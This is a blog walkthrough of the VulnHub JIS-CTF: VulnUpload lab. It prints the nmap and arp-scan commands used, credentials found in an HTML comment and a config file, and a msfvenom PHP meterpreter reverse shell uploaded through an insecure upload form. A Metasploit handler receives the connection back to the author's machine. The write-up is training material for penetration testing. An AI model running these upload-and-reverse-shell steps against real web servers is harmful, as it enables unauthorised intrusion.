JIS-CTF: VulnUpload Walkthrough

I have completed another challenge from vulnhub.com, which is JIS-CTF: VulnUpload. The description says, there are 5 flags and our job is to find them. It also says it takes 1.5 hours to complete this challenge.

Let’s start

I started with an arp-scan as usual, which shows us the IP address of our target.

root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts
192.168.1.115 08:00:27:94:a2:42 CADMUS COMPUTER SYSTEMS

At this point, we’re ready to move on and gather more information about the target, such as what ports are open, etc… Here comes the good old nmap scan:

root@kali:~# nmap -A 192.168.1.115
Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-11 09:32 EDT
Nmap scan report for 192.168.1.115
Host is up (0.00018s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 af:b9:68:38:77:7c:40:f6:bf:98:09:ff:d9:5f:73:ec (RSA)
|   256 b9:df:60:1e:6d:6f:d7:f6:24:fd:ae:f8:e3:cf:16:ac (ECDSA)
|_  256 78:5a:95:bb:d5:bf:ad:cf:b2:f5:0f:c0:0c:af:f7:76 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 8 disallowed entries 
| / /backup /admin /admin_area /r00t /uploads 
|_/uploaded_files /flag
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-title: Sign-Up/Login Form
|_Requested resource was login.php
MAC Address: 08:00:27:94:A2:42 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

As you can see, nmap lists the disallowed entries from the robots.txt file. I immediately went for the low hanging fruit in the flag directory.

The 1st flag is : {8734509128730458630012095}

Next, I tried the /r00t and /admin directory as well as /uploads, but it was a dead end. In the /admin_area, I inspected the source code and found the following:

<html><head>
<title>
Fake admin area :)
</title>
</head><body>
<center><h1>The admin area not work :) </h1></center>
<!-- username : admin
 password : 3v1l_H@ck3r
 The 2nd flag is : {7412574125871236547895214}
-->
</body></html>

The 2nd flag is : {7412574125871236547895214}

I got the required credentials and successfully logged in with admin. There was nothing interesting, except for the vulnerable upload. I created a reverse shell with msfvenom:

root@kali:~# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.118 lport=9696 R > exploit.php

Then, I uploaded the file and went to set up the handler:

msf > use exploit/multi/handler
msf exploit(multi/handler) > set lhost 192.168.1.118
lhost=> 192.168.1.118
msf exploit(multi/handler) > set lport 9696
lport => 9696
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > exploit

At that point the handler was running and ready to accept incoming connections. All I had to do is execute the file on the server, so I navigated to “http://192.168.1.115/uploaded_files/exploit.php” and got a shell.

[*] Started reverse TCP handler on 192.168.1.118:9696 
[*] Sending stage (37775 bytes) to 192.168.1.115
[*] Sleeping before handling stage...
[*] Meterpreter session 1 opened (192.168.1.118:9696 -> 192.168.1.115:36790) at 2018-04-11 11:00:27 -0400

I started to play around and explore the directories. In the /var/ww/html directory, I found a file called “hint.txt”.

meterpreter > cat hint.txt
try to find user technawi password to read the flag.txt file, you can find it in a hidden file ;)
The 3rd flag is : {7645110034526579012345670}

The 3rd flag is : {7645110034526579012345670}

I had to find the password for technawi…this was not as easy as any other task during the challenge. I got frustrated because I was not able to find the above mentioned hidden file. Actually, this statement was a little misleading, because the file we are looking for was not hidden… I tried to search for user, pass, etc… files, but unfortunately, none of them worked. Lastly, I tried “find / -name cred*”, which revealed the /etc/mysql/conf.d/credentials.txt file.

cat /etc/mysql/conf.d/credentials.txt
The 4th flag is : {7845658974123568974185412}
username : technawi
password : 3vilH@ksor

The 4th flag is : {7845658974123568974185412}

I made use of the SSH port and logged in as “technawi”. Now, I can print out the flag.txt file in the /var/www/html directory.

technawi@Jordaninfosec-CTF01:~$ cd /var/www/html
technawi@Jordaninfosec-CTF01:/var/www/html$ cat flag.txt 
The 5th flag is : {5473215946785213456975249}
Good job :)
You find 5 flags and got their points and finish the first scenario....

The 5th flag is : {5473215946785213456975249}

Closing thoughts

If you are new to penetration testing or CTF games, don’t be discouraged if you got stuck or did not know what to do next. Keep doing these games and you’ll certainly improve your skills. Happy hacking!

Before you go…

Thank you for taking the time to read my walkthrough. If you found it helpful, please hit the 👏 button 👏 (up to 50x) and share it to help others with similar interest find it! + Feedback is always welcome! 🙏